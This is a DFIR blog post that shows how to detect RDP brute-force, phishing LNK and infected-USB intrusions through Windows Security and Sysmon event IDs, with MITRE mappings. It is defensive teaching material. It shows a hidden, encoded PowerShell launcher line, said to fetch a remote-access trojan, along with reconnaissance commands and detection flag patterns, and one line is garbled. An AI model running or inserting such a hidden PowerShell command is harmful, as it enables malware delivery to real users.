Windows Threat Detection: A DFIR Guide to RDP, Phishing, and USB Attacks
- DFIRHive
- Oct 26
- 5 min read
Introduction: Where Every Breach Begins
Every major incident — ransomware, data theft, or lateral compromise — begins with a single step: Initial Access.
Sometimes that step is obvious — an admin enabling RDP for convenience.
Other times, it’s subtle — a phishing attachment disguised as a PDF, or a USB drive left behind at reception.
And that’s what makes this stage so critical. Catching the attack here means stopping it before persistence, discovery, or encryption ever begin.
This guide expands on concepts from TryHackMe’s Windows Threat Detection lab and blends them with real-world case reporting — like Mandiant’s M-Trends 2025, BlackSuit ransomware, and the Raspberry Robin USB worm
I found them invaluable for bridging practical log analysis with real-world adversary behavior — and this post expands on those ideas for analysts and defenders who want to understand why these detections matter.
Understanding Initial Access
Threat actors gain entry in two primary ways:
Exposed Services — RDP, SSH, HTTP, and similar services reachable from the internet.
Application))
Threat groups like Medusa, BlackSuit, and Akira routinely use these same access vectors — proof that simple misconfigurations and human trust remain the most exploited “vulnerabilities.”
Case 1 — RDP: The “Ransomware Deployment Protocol”
RDP is one of the most common initial access methods observed in modern ransomware cases. In fact, defenders half-jokingly call it the “Ransomware Deployment Protocol.”
According to Censys Search, over 5 million RDP-enabled systems are exposed on the internet right now. Many are unprotected or use weak credentials, making them easy targets for automated brute-force attacks.
Scenario:
An IT admin enabled RDP on a production server to work from home on weekends.
Within hours, bots discovered the open port and began brute-forcing it. The entire compromise could be reconstructed from native Windows logs.
Step 1 — Detect the Brute Force
Event Source: Security Log
Event ID: 4625 (Failed logon attempts)
Filter for:
Repeated failed logons
External IP addresses ( IpAddress ≠ 10., 172.16., 192.168.*)
Why: Dozens of failed 4625 events from different IPs are a hallmark of credential stuffing or brute-force activity.
Step 2 — Confirm the Breakthrough
Event ID: 4624 (Successful logon)
Logon Type: 10 (Remote Interactive), 3 (Network share)
Copy the Logon ID field — this links authentication with later process activity.
This event marks when the attacker finally succeeded.
Step 3 — Trace Attacker Actions (Sysmon)
With the Logon ID, pivot to Sysmon logs.
Look for:
Sysmon 1 (ProcessCreate): whoami, ipconfig, net user, tasklist
Sysmon 3 (NetworkConnect): Outbound IPs or domains
Sysmon 11 (FileCreate): Tools downloaded or executed
Sysmon 19/4698: Scheduled task creation (persistence)
These are the exact same patterns observed in real Akira and BlackSuit ransomware intrusions — quick reconnaissance and tool staging within minutes of the initial RDP login.
Note: Pair Security 4624 (success) with Sysmon 1 (process creation).If the same user launches command shells right after a remote login, it’s almost certainly malicious.
Evidence Collection
Export Security.evtx for the 4625 → 4624 window.
Export corresponding Sysmon EVTX.
Hash and preserve dropped binaries.
Note timestamps for correlation.
MITRE Techniques:T1133 — External Remote Services, T1021.001 — Remote Services: RDPT1053 — Scheduled Task (Persistence)
Case 2 — Phishing Attachments: When Curiosity Opens the Door
Phishing remains one of the most resilient intrusion techniques.According to HoxHunt’s 2025 Report, phishing incidents have surged 41× since 2022 — largely due to automation and AI-generated lures.
Scenario:
The victim receives an email titled “Invoice 2025” with an attachment:
Invoice.pdf.lnk
When opened, the shortcut silently executes PowerShell:
powershell -nop -w hidden -enc <Base64Payload>
Decoded, the command downloads and executes RemcosRAT — a well-known remote-access Trojan.
Step 1 — Identify File Creation (Sysmon 11)
Look for .lnk or .zip files created in the user’s Downloads\ directory.
Why: Shows the arrival of the phishing artifact.
Step 2 — Detect Execution Chain (Sysmon 1)
Check for:
ParentImage: explorer.exe
Image: powershell.exe
CommandLine: -enc, -nop, -w hidden
This execution chain (explorer → powershell) is the defining footprint of malicious LNK activity.
Step 3 — Follow the Network & Dropper Activity
Sysmon 3: PowerShell making external connections.
Sysmon 11: File creation like C:\Users\Public\invoice_update.exe.
Sysmon 1: New process creation for that executable.
Evidence Collection
Save the .lnk and the decoded PowerShell payload.
Extract the downloaded binary for analysis.
Pull related proxy/DNS entries for exfiltration domains.
MITRE Techniques:T1566.001 — Spearphishing Attachment, T1105 — Ingress Tool Transfer
Case 3 — Infected USBs: Old Tricks Still Work
Not every breach starts online. Attacks like Camaro Dragon and Raspberry Robin spread via infected USB drives — exploiting curiosity and convenience.
These worms often:
Hide real files, replace them with malicious .lnk shortcuts.
Use double extensions (photo.jpg.exe).
Execute payloads that establish persistence or C2 connections.
Scenario:
A USB labeled “HR Bonus Documents” is inserted into a workstation. The user double-clicks what looks like a folder — actually bonus.pdf.exe.
Detection Steps
Sysmon 1: Execution from E:\ or F:\ (external drives).
Sysmon 11: Copy of the same file into C:\Users\Public\ or C:\Windows\Temp\.
Sysmon 3: Outbound network traffic following execution.
Evidence Collection
Forensic copy of the USB contents.
Sysmon log slices around the insertion time.
Host copy of the payload (hash + quarantine).
MITRE Techniques:T1091 — Replication Through Removable Media, T1105 — Ingress Tool Transfer
Why These Detections Matter
Every one of these techniques — RDP, phishing, removable media — leaves evidence in plain sight. The difference between a compromise and a contained incident often comes down to whether someone notices:
A burst of 4625s followed by one 4624.
An explorer.exe → powershell.exe chain.
A process spawning from E:\.
Learning to connect those dots transforms raw logs into a timeline of intent.
Takeaways
Investigation Focus | Event Source | Event IDs | Purpose |
Brute-force login | Security | 4625 / 4624 (Type 10) | Identify exposed RDP login attempts |
Command execution | Sysmon | 1 | Show attacker activity post-login |
File creation | Sysmon | 11 | Detect dropped or staged payloads |
Network connect | Sysmon | 3 | Reveal C2 or payload download |
Persistence tasks | Security / Sysmon | 4698 / 19 | Scheduled task creation |
Quick reading list (references)
MITRE ATT&CK Framework – attack.mitre.org
CISA Advisories – cisa.gov
DFIR Report – BlackSuit Ransomware – Unit42 Threat Assessment
HoxHunt Phishing Trends 2025 – hoxhunt.com
Check Point – Camaro Dragon – research.checkpoint.com
Red Canary – Raspberry Robin – redcanary.com
Microsoft – Raspberry Robin Worm – microsoft.com
Mandiant M-Trends 2025 Report (PDF) – services.google.com/fh/files/misc/m-trends-2025-en.pdf
This post draws on the TryHackMe “Windows Threat Detection” labs to connect practical telemetry with adversary behavior. In future parts, we’ll expand into persistence, privilege escalation, and lateral movement — continuing the journey from initial access to full incident response.
Comments